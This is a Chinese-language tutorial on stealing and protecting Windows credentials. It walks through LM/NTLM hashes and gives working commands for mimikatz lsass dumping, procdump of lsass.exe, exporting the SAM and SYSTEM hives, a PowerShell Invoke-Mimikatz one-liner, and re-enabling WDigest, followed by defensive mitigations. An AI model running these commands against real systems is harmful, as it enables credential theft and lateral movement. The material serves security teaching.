Windows系统密码抓取与防护

单机密码抓取与防范

LM Hash 和NTLM Hash

LM Hash(DES加密) 默认禁用,一般攻击者抓取的LM Hash值为aad3b435b51404eeaad3b435b51404ee 表示LM Hash为空值或被禁用
NTLM Hash(MD4加密) 真正是用户密码的哈希值
Windows操作系统中的密码一般由两部分组成:
一部分为LM Hash,另一部分为NTLM Hash。在Windows中,Hash的结构通常如下:
Username:RID:LM-Hash:NT-Hash

(1) GetPass
https://bbs.pediy.com/thread-163383.htm

(2) PwDump7
下载地址:
https://www.openwall.com/passwords/windows-pwdump
https://www.tarasco.org/security/pwdump_7/Pwdump7可以在CMD下提取出系统中的用户的密码hash (包括LM和NTLM),
需要系统权限,“骨灰”级黑客玩家可能听说过这个玩具。
通过Pwdump7提取出的HASH,可以用ophcrack等工具破出明文密码,
对进一步渗透是有很大帮助的。工具使用很简单,只需在命令行环境中运行Pwdump7程序,
即可得到当前系统中各个用户的密码Hash (包括LM和NTLM):

(3) Mimikatz

能够直接读取Windows操作系统的明文密码
最大的亮点就是他可以直接从 lsass.exe 进程中获取当前登录系统用户名的密码
登陆系统时输入密码之后,密码便会储存在lsass内存中, 而 mimikatz 正是通过对lsass获取到明文密码!也就是说只要你不重启电脑,就可以通过他获取到登陆密码,只限当前登陆系统

注:但是在安装了KB2871997补丁或者系统版本大于win10或windows server 2012时,默认在内存缓存中禁止保存明文密码,
这样利用mimikatz就不能从内存中读出明文密码了,但可以通过修改注册表的方式抓取明文

privilege::debug      // 提升至debug权限
sekurlsa::logonpasswords       // 抓取密码

(4) Procdump
Procdump是微软官方发布的工具,所以杀软不会拦截,其可以用来将
目标lsass文件导出
下载地址:
https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump
先用在目标机器上传微软的工具Procdump,导出其lsass.exe:
procdump64.exe -accepteula -ma lsass.exe lsass.dmp

执行mimikatz导出lsass.dmp里面的密码和hash
sekurlsa::minidump .\lsass.dmp // 将导出的lsass.dmp载入到mimikatz中
sekurlsa::logonpasswords full // 获取密码

(5) 通过SAM和System文件抓取密码
先利用注册表命令将目标机的sam或system文件导出,需要管理员权限:
reg save hklm\sam sam.hive
reg save hklm\system system.hive

然后,将目标机上的sam.hive和system.hive下载到本地,
利用mimikatz读取sam和system文件获取NTLM Hash
(保证下载的文件和mimikatz在相同的目录下)
lsadump::sam /sam:sam.hive /system:system.hive

也可以直接使用mimikatz读取本地SAM文件,获得密码Hash:
privilege::debug
token::elevate
lsadump::sam

(6)Powershell脚本
使用powershell脚本加载mimikatz模块获取密码,该脚本位于
powersploit后渗透框架中
下载地址;
https://github.com/PowerShellMafia/PowerSploit
通过在目标机上远程下载执行该powershell脚本即可获取密码,需要管理员权限

脚本代码如下:

powershell -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('C:\Users\Administrator\Desktop\Procdump\ProcdumpInvoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

(7) Nishang的Get-PassHashes模块
以管理员身份打开Powershell环境
Import-Module .\Get-PassHashes.ps1
执行Get-PassHashes.ps1    导出散列值

(8) 单机密码抓取的防范方法

微软为了防止用户的明文密码在内存中泄露,发布了KB2871997补丁,
关闭了Wdigest功能。
Windows Server2012及以上版本默认关闭Wdigest,使攻击者无法从内存
中获取明文密码。Windows Server2012以下版本,
如果安装了KB2871997补丁,攻击者同样无法获取明文密码
在命令行环境开启或关闭Wdigest Auth,有如下两种方法

使用 red add命令
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f // 开启Wdigest Auth

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f // 关闭Wdigest Auth

攻击方法:需要将UseLogonCredential的值设为1,然后注销当前用户,用户再次登录后使用mimikatz即可导出明文口令

防范黑客抓取明文密码和散列值

(1) 设置全局安全组
Server2012新增了一个全局安全组,只需要将用户加入到组中,
就无法使用mimikatz等工具抓取明文密码和散列值了

(2)安装KB2871997补丁

安装此补丁能够使本地账号不再被远程接入,但是系统默认的本地管理员账号Administrator这个SID为500的用户例外,即使将用户改名,但是SID任然是500,攻击者任然可以通过横向攻击方法获得内网中其他机器的控制权。

(3) 修改注册表键值禁止内存中存储明文密码

WDigest协议,能够将windows明文密码储存在内存中,方便用户登录本地计算机
命令行环境开启或关闭Wdigest Auth,有如下两种方法
方法(1): reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

方法(2): reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f
reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential 查询更改

(4) 防御mimikatz攻击(限制Debug权限)

mimikatz在抓取散列值或者明文密码时需要使用Debug权限,因为mimikatz需要和lsass进程进行交互。将拥有Debug权限的本地管理员从
Administrator组中删除。

工具链接
链接:https://pan.baidu.com/s/1hvr8KTIl6Zx8QJswkl-b8Q
提取码:dxjp

Windows系统密码抓取与防护相关推荐

  1. 关于Windows系列密码抓取

    首先,还是回顾一下windows系统密码Hash的一些知识吧:(下面这段来自网络) 首先介绍一下windows密码Hash: 早期SMB协议在网络上传输明文口令.后来出现"LAN Manag ...

  2. 内网安全之:Windows 密码抓取

    郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关.倡导维护网络安全人人有责,共同维护网络文明和谐. Wi ...

  3. 【网络安全学习实践】Windows系统密码破解防护及用户和组管理

    halo~我是bay_Tong桐小白 本文内容是桐小白个人对所学知识进行的总结和分享,知识点会不定期进行编辑更新和完善,了解最近更新内容可参看更新日志,欢迎各位大神留言.指点 [学习网络安全知识,维护 ...

  4. WINDOWS系统密码破解全攻略

    题目:Windows系统密码破解全攻略 作者:hackest [H.S.T.] 来源:hackest's blog 此文章已发表在<黑客X档案>2009年第6期杂志上 后经作者发布在博客上 ...

  5. 【CyberSecurityLearning 3】批处理、用户与组管理、服务器远程管理、破解Windows系统密码

    目录 一.批处理编写 1.1.批处理作用 1.2.如何创建批处理 1.3.批处理基本语法 1.3.1.@echo off 1.3.2.pause 1.3.3.title 1.3.4.echo. 1.3 ...

  6. 通过PowerShell获取Windows系统密码Hash

    当你拿到了系统控制权之后如何才能更长的时间内控制已经拿到这台机器呢?作为白帽子,已经在对手防线上撕开一个口子,如果你需要进一步扩大战果,你首先需要做的就是潜伏下来,收集更多的信息便于你判断,便于有更大 ...

  7. buuctf · windows系统密码 · wp

    题目来源:buuctf· Windows系统密码(BUUCTF在线评测 (buuoj.cn)) 附件情况​ 发现是hash拓展名的文件,这不直接提示这要用哈希来解咯 那就先用md5看看,不行再试试sh ...

  8. 二 PE破解windows系统密码

    这里写目录标题 window7及window10 破解方式 第一步 第二步 第三步 第四步 第五步 最后一步 总结 本期,是 黑客学好好,牢饭香喷喷合集的第二篇 这期的目的与上次类似,也是破解wind ...

  9. 1.2物理接触获取并破解windows系统密码

    1.2物理接触获取并破解windows系统密码 很多人认为个人计算机比较安全,因为给计算机设置了密码,外人不知道设置的密码,因此也就安全了,其实这里面很很大的误解,个人计算机安全除了设置密码强健程度以 ...

最新文章

  1. 指定域的名称或安全标识(SID)与该域的信任信息不一致
  2. 电脑常用音频剪辑软件_如何使用音频剪辑软件,快速剪辑任意格式音频!
  3. Ubuntu 配置swftools(Ubuntu14.04)
  4. android ocr识别源码_身份证识别OCR解决手动输入繁琐问题
  5. IOS7的蛋疼各种收集
  6. c#static中静态方法_用C ++进行静态转换– static_cast()方法
  7. [渝粤教育] 西南科技大学 单片机原理与应用 在线考试复习资料
  8. docker部署svnadmin进行权限管理
  9. 百度地图API学习之定位当前位置及自定义覆盖物和信息窗口
  10. 【摄影笔记三】光圈和快门
  11. HE4484E泛海微5V USB 输入双节锂电池串联应用升压充电IC管理芯片
  12. 2021年第六届数维杯A题 外卖骑手的送餐危机
  13. 干货!微博营销的技巧与利弊
  14. lua脚本php,phpStudy中起用lua脚本_PHP教程
  15. C# 操作Word书签(一)插入、删除书签
  16. Linux版本有哪些
  17. CentOS6.8 切换桌面模式与命令行模式
  18. 图灵 | 一站式图应用平台
  19. Django中使用富文本编辑器Uedit
  20. 如果只定一个指标,研发的考核指标应该是什么?

热门文章

  1. can总线的示波器检测方法
  2. 工业机器人上下料数控车床实训平台
  3. Unity3D开发的2D游戏---《趣味推箱子》
  4. 快速了解A/D(模数转换器)
  5. 赫兹的单位换算_赫兹是什么单位名称(赫兹单位名称及换算方法)
  6. 酒店管理系统软件测试找bug,软件测试查找bug原因
  7. PHP图片转base64
  8. AtCoder Contest 229-C-Cheese
  9. Zedboard系列教程
  10. 【T-SQL】财务PMT+PV函数